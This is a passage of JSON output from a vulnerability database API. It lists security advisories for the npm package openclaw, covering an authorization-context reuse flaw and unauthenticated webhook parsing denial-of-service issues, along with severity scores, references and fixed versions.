                    "url": "http://public2.vulnerablecode.io/api/packages/114466?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.22"
                }
            ],
            "aliases": [
                "CVE-2026-44112",
                "GHSA-wppj-c6mr-83jj"
            ],
            "risk_score": 4.3,
            "exploitability": "0.5",
            "weighted_severity": "8.6",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t2ve-xemk-mqa9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89045?format=api",
            "vulnerability_id": "VCID-t2yy-9ume-t7be",
            "summary": "OpenClaw: Collect-mode queue batches could reuse the last sender authorization context\n## Summary\n\nCollect-mode queue batches could reuse the last sender authorization context.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.14`\n- Patched versions: `>= 2026.4.14`\n\n## Impact\n\nCollect-mode queued messages from different senders could be drained as one batch using the final sender's authorization context, allowing earlier messages to inherit a more privileged context.\n\n## Technical Details\n\nThe fix splits collect-mode batches by sender authorization context before dispatch, preserving each message's own trust state.\n\n## Fix\n\nThe issue was fixed in #66024. The first stable tag containing the fix is `v2026.4.14`, and `openclaw@2026.4.14` includes the fix.\n\n## Fix Commit(s)\n\n- `43d4be902755c970b3d15608679761877718da69`\n- PR: #66024\n\n## Release Process Note\n\nUsers should upgrade to `openclaw` 2026.4.14 or newer. The latest npm release, `2026.4.14`, already includes the fix.\n\n## Credits\n\nThanks to @zsxsoft, with sponsorship from @KeenSecurityLab and @qclawer for reporting this issue.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43535",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00026",
                            "scoring_system": "epss",
                            "scoring_elements": "0.07719",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08979",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.0003",
                            "scoring_system": "epss",
                            "scoring_elements": "0.08998",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-43535"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/43d4be902755c970b3d15608679761877718da69"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/pull/66024",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/pull/66024"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jwrq-8g5x-5fhm"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43535",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43535"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N"
                        },
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-05T12:07:14Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-context-reuse-in-collect-mode-queue-batches"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-jwrq-8g5x-5fhm",
                    "reference_id": "GHSA-jwrq-8g5x-5fhm",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-jwrq-8g5x-5fhm"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109967?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.14",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.14"
                }
            ],
            "aliases": [
                "CVE-2026-43535",
                "GHSA-jwrq-8g5x-5fhm"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t2yy-9ume-t7be"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89218?format=api",
            "vulnerability_id": "VCID-t991-75e7-ykdv",
            "summary": "OpenClaw: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n## Summary\nMS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3834d47099dd13c8244ed6de8b9ea9855c553623` — 2026-03-30T13:46:40+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41405",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00228",
                            "scoring_system": "epss",
                            "scoring_elements": "0.45732",
                            "published_at": "2026-06-05T12:55:00Z"
                        },
                        {
                            "value": "0.00228",
                            "scoring_system": "epss",
                            "scoring_elements": "0.45716",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00228",
                            "scoring_system": "epss",
                            "scoring_elements": "0.45736",
                            "published_at": "2026-06-06T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41405"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41405",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41405"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "8.7",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-p464-m8x6-vhv8",
                    "reference_id": "GHSA-p464-m8x6-vhv8",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-p464-m8x6-vhv8"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41405",
                "GHSA-p464-m8x6-vhv8"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-t991-75e7-ykdv"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89742?format=api",
            "vulnerability_id": "VCID-te8f-snty-j7hh",
            "summary": "Duplicate Advisory: OpenClaw: Feishu webhook reads and parses unauthenticated request bodies before signature validation\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-3h52-cx59-c456. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.25 parses JSON request bodies before validating webhook signatures, allowing unauthenticated attackers to force resource-intensive parsing operations. Remote attackers can send malicious webhook requests to trigger denial of service by exhausting server resources through forced JSON parsing before signature rejection.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/5e8cb22176e9235e224be0bc530699261eb60e53"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3h52-cx59-c456"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35640"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-unauthenticated-webhook-request-parsing",
